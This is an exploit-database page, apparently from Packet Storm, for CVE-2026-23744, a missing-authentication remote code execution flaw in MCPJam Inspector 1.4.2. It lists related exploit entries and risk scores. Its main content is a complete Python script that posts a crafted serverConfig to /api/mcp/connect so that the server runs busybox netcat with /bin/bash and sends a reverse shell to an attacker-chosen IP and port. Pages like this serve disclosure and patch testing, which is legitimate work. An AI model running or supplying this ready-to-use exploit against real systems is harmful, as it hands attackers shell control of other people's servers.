📄 MCPJam Inspector 1.4.2 Remote Code Execution

🗓️ 24 Mar 2026 00:00:00Reported by FrenzisRedType

packetstorm🔗 packetstorm.news👁 374 Views

MCPJam Inspector 1.4.2 RCE test for CVE-2026-23744 using /api/mcp/connect to spawn reverse shell.

Reporter	Title	Published	Views	Family All 43
GithubExploit	Exploit for Missing Authentication for Critical Function in Mcpjam Inspector	27 Mar 202615:57	–	githubexploit
GithubExploit	Exploit for Missing Authentication for Critical Function in Mcpjam Inspector	31 May 202619:17	–	githubexploit
GithubExploit	Exploit for Missing Authentication for Critical Function in Mcpjam Inspector	27 Mar 202615:57	–	githubexploit
GithubExploit	Exploit for Missing Authentication for Critical Function in Mcpjam Inspector	31 May 202617:27	–	githubexploit
GithubExploit	Exploit for Missing Authentication for Critical Function in Mcpjam Inspector	28 Mar 202620:03	–	githubexploit
GithubExploit	Exploit for Missing Authentication for Critical Function in Mcpjam Inspector	30 May 202622:03	–	githubexploit
GithubExploit	Exploit for Missing Authentication for Critical Function in Mcpjam Inspector	24 Mar 202619:18	–	githubexploit
GithubExploit	Exploit for Missing Authentication for Critical Function in Mcpjam Inspector	27 Mar 202614:14	–	githubexploit
GithubExploit	Exploit for Missing Authentication for Critical Function in Mcpjam Inspector	5 Jun 202607:27	–	githubexploit
GithubExploit	Exploit for Missing Authentication for Critical Function in Mcpjam Inspector	29 Mar 202616:26	–	githubexploit

#!/usr/bin/env python3
    
    #################################
    #                               #
    #       CVE-2026-23744.py       #
    #       for testing only        #
    #                               #
    #################################
    
    import requests
    import argparse
    import json
    import sys
    import urllib3
    
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    
    def main():
        parser = argparse.ArgumentParser(description='MCPJam Inspector RCE (GHSA-232v-j27c-5pp6) - CVE-2026-23744')
        parser.add_argument('--target', '-t', required=True, help='Target URL e.g. https://mcp.domain.com')
        parser.add_argument('--att-ip', '-i', required=True, help='Attacker IP for revshell listener')
        parser.add_argument('--att-port', '-p', required=True, help='Attacker port for revshell listener')
    
        args = parser.parse_args()
    
        url = f'{args.target}/api/mcp/connect'
    
        data = {"serverConfig": {"command": "busybox", "args": ["nc", args.att_ip, args.att_port, "-e", "/bin/bash"], "env": {}}, "serverId": "mcp_test_server"}
    
        print(f"\n{parser.description}\n")
    
        print(f"[+] Sending revshell to {args.att_ip}:{args.att_port} via {url}")
        print(f"[+] Payload: {json.dumps(data)}")
    
        try:
            response = requests.post(url, json=data, verify=False, timeout=10)
            print(f"[+] Status: {response.status_code}")
            print(f"[+] Response: {response.text}")
    
            if response.status_code == 200:
                print("[+] Check your listener!")
            else:
                print("[-] Exploit failed - check target/path")
    
        except requests.exceptions.RequestException as e:
            print(f"[-] Request failed: {e}")
            print("[+] Check your listener, script did not detect response.")
            sys.exit(1)
    
    if __name__ == "__main__":
        main()

24 Mar 2026 00:00Current

6.5Medium risk

Vulners AI Score6.5

CVSS 3.19.8

EPSS0.30368

SSVC